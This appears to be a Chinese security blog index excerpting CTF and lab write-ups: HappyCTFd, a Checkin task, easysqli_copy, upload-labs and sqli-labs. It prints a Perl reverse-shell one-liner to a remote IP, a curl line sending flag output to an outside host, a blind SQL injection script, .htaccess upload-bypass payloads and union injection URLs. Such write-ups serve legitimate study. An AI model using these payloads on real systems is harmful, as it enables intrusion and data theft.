Tyaoo's Blog

师傅们出的题目都挺有意思 自己还是有很大差距 dooog下载源文件后查看主要有三个站，分别是 client 端、cmd_server 端和 kdc 端，下面是我整理三个文件夹逻辑，随缘看一下。 # cmd_server/app.pyflag = os.system("curl http://xxxxxx/`readflag`")1. os.system(msg[2])2. username == msg[1]3. username = cryptor.decrypt(base64.b64decode(authenticator))4. authenticator = request.form.get('authenticator')5. msg = cryptor.decrypt(base64.b64decode(server_message)).split('|')6. server_message = request.form.get('server_message')# client/app.py ...

有很多地方没有转过来，思维过于僵硬，感谢赵师傅出的精美题目 HappyCTFdCTFd 的漏洞 简单来说来说就是注册带空格恶意用户名然后忘记密码进行修改 https://www.colabug.com/2020/0204/6940556/ Checkin找了亿个反弹 shell，下面是有用的一个 https://zerokeeper.com/experience/a-variety-of-environmental-rebound-shell-method.html http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.216.98:9000");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 系统没有 losf、ps ...

学习到了一点新知识 easysqli_copy本题漏洞比较明显，PDO 支持堆叠注入，然后用十六进制绕过 check。 import requestsimport stringimport binasciiimport urllib.parseimport threadingurl = "http://4efaa4d7badc406b9b50ecab0c36eaeb13b1c0c4b1b14e55.changame.ichunqiu.com/"flag = ""index = 1chset = string.printablesession = requests.Session()# dbname = pdotest# tbname = table1# clname = balabala,eihey,fllllll4g,bbbflag = ''index = 1while True: l = 0 r = 127 m = (l+r)//2 while l<r: # print("[*] ...

之前的一些关于 upload-labs 的练习 Pass-01修改后缀名 Pass-02Content-type 改为 image/gif Pass-03 改后缀名 php2, php3, php4, php5, phps, pht, phtm, phtml 重写文件解析规则绕过。上传先上传一个名为.htaccess文件，内容如下： <FilesMatch "03.jpg">SetHandler application/x-httpd-php</FilesMatch> 然后再上传一个03.jpg 执行上传的03.jpg脚本 Pass-04查看源代码 发现黑名单几乎过滤了全部的违法后缀名 ，但少过滤了 .htaccess 后缀 上传一个.htaccess 文件 重写 服务器的文件解析 创建一个 .htaccess 文件 内容可以是 : AddType application/x-httpd-php .jpg,可将jpg文件解析为php文件. 或者是 : SetHandler application/x-httpd-ph ...

之前的一些关于 sqli-labs 的练习 Less-1（单引号 union 注入）?id=' union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+?id=' union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+?id=' union select 1,2,group_concat(password) from users--+ Less-2（无引号 union 注入）?id=0 union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SC ...